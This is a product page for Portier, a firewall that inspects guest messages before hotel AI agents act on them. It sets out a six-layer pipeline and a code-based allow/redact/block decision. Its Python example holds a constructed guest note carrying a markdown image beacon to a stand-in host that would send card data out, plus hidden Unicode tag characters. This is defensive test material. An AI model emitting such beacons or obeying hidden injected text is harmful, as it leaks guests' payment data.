Portier
⚡ Live on Claude
A doorkeeper for your AI agents.
Your concierge and guest-service agents read untrusted guest text — booking notes, chats. Portier inspects every message before the agent acts and returns a deterministic ALLOW · REDACT · BLOCK decision in code, mapped to OWASP LLM Top 10 (2025), the OWASP Agentic Top 10, and NIST AI RMF.
Live inspection
Pick a scenario — or paste your own note and try to get something past the firewall. The six-layer trace streams in live; deterministic code makes the call.
Try it yourself
Press Try ▸ on any example to load it into the box above and watch the six-layer trace stream, or Copy it and edit your own. It all runs in safe DEMO mode — paste anything you like. Each card shows the expected verdict and why the deterministic boundary reaches it.
The inspection pipeline
Probabilistic layers produce evidence first; deterministic code makes and enforces the decision. If a probabilistic layer is wrong, the verdict does not change — the boundary is code.
The agent registry
Least privilege is real, not cosmetic: each specialist sees only its slice of tools, and none of them can act — they read and classify. The decision is made by code that has no model at all.
| Agent | Model role | Scoped tools (least privilege) |
|---|---|---|
| Inspector | supervisor — delegates & assembles a typed verdict; never decides | delegate-only · no data tools |
| InjectionAnalyst | prompt-injection / jailbreak intent | vector_signatures · read-only |
| DataClassifier | sensitive-access & state-change intent | classification_ctx · read-only |
| FrameworkMapper | OWASP / NIST mapping | knowledge_base · read-only |
| PolicyEngine | the security boundary — pure code | no LLM · no tools |
The defense, layer by layer
Six ordered layers, each tagged by what it can promise. Built from the 2025–2026 state of the art — every layer cited to its primary source.
A Probabilistic signals
Untrusted content is wrapped & datamarked so the agent treats it as opaque data — not instructions. Microsoft.
sqlite-vec KNN against known injection signatures. A vote, never a verdict — shown as audit evidence. OWASP LLM08.
Scoped PydanticAI specialists read & classify only — the dual-LLM / CaMeL pattern. DeepMind.
B Deterministic guarantees
Microsoft Presidio detects guest PII and card data; redaction is applied in code. OWASP LLM02.
Meta's Rule of Two + egress allowlist → the ALLOW/REDACT/BLOCK decision. Pure function, exhaustively tested. OWASP LLM06.
Strip hidden Unicode tag chars; defang markdown images/links — closes exfiltration channels without the model. SOTA.
Deployed on Cloudflare
A Worker at the edge fronts a Python container — no servers to manage, scales to zero. The LLM & graph backends are optional (LIVE mode); DEMO runs with neither.
Gateway
Serves this console, relays SSE, sets security headers, and rate-limits /inspect. Holds no security logic.
Inspection engine
The six-layer pipeline + the deterministic policy boundary. PydanticAI · Azure/Claude · sqlite-vec · Presidio · Neo4j · rate-limit · audit log
The safety boundary is code, not a prompt
2025–2026 consensus: prompt injection can't be solved at the model layer. So the decision is made by a pure function — even a fully jailbroken specialist cannot change the verdict.
```python
# the security boundary — pure Python, no LLM, exhaustively tested
def decide(signals) -> Decision:
    rule_of_two = (signals.untrusted_input + signals.sensitive_access + signals.state_change) >= 3
    egress_bad = any(t not in ALLOWLIST for t in signals.egress_targets)
    if rule_of_two or egress_bad or signals.has_critical:
        return Decision(BLOCK, ...)  # code decides — never the model
    if signals.pii_entities:
        return Decision(REDACT, ...)
    return Decision(ALLOW, ...)
```
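As an added example (not Portier's own code), a self-contained version of layer B as described above: the Rule of Two plus egress-allowlist decision sketched in decide(), together with the Unicode-tag stripping and markdown defanging of the sanitizer layer. Verdict, Signals, the ALLOWLIST hosts, sanitize() and the sample note are assumed names and constructed values.

```python
# Added example, not Portier's own code. Names and hosts below are assumed.
import re
from dataclasses import dataclass, field
from enum import Enum

class Verdict(Enum):
    ALLOW = "ALLOW"
    REDACT = "REDACT"
    BLOCK = "BLOCK"

@dataclass
class Signals:
    untrusted_input: bool       # message came from guest text
    sensitive_access: bool      # agent would read PII / booking data
    state_change: bool          # agent would modify a booking or send mail
    egress_targets: list = field(default_factory=list)
    pii_entities: list = field(default_factory=list)
    has_critical: bool = False  # e.g. a confirmed injection-signature hit

ALLOWLIST = frozenset({"pms.internal", "mail.internal"})  # assumed egress hosts

def decide(s: Signals) -> Verdict:
    # Meta's Rule of Two: all three risky properties at once is never allowed
    rule_of_two = (s.untrusted_input + s.sensitive_access + s.state_change) >= 3
    egress_bad = any(t not in ALLOWLIST for t in s.egress_targets)
    if rule_of_two or egress_bad or s.has_critical:
        return Verdict.BLOCK  # code decides, never the model
    if s.pii_entities:
        return Verdict.REDACT
    return Verdict.ALLOW

# Unicode "tag" characters (U+E0000..U+E007F) render invisibly but carry text
TAG_CHARS = re.compile("[\U000E0000-\U000E007F]")
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)]*)\)")
MD_LINK = re.compile(r"(?<!!)\[([^\]]*)\]\(([^)]*)\)")

def sanitize(text: str) -> str:
    """Strip hidden tag chars; defang markdown images/links. No model involved."""
    text = TAG_CHARS.sub("", text)
    text = MD_IMAGE.sub(r"[image removed: \1]", text)   # image fetch = beacon
    text = MD_LINK.sub(r"[link removed: \1]", text)     # no clickable URL
    return text

if __name__ == "__main__":
    # constructed guest note carrying a markdown image beacon and hidden tag text
    note = "Late check-in please ![](https://beacon.example/?d=card)\U000E0048\U000E0049"
    print(sanitize(note))
    print(decide(Signals(True, True, False, pii_entities=["CREDIT_CARD"])))
```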
Everything used to build it
A current stack — PydanticAI agents, the edge platform, and a verified security posture, every choice deliberate.
How it was built
From a job spec to a deployed, hardened system — research-first, spec-driven, verified in the real app.
Built on the spec
Every layer maps to a primary source — published security frameworks, peer-reviewed injection-defense research, and official platform docs. This is what Portier is built on, and the best practices it follows.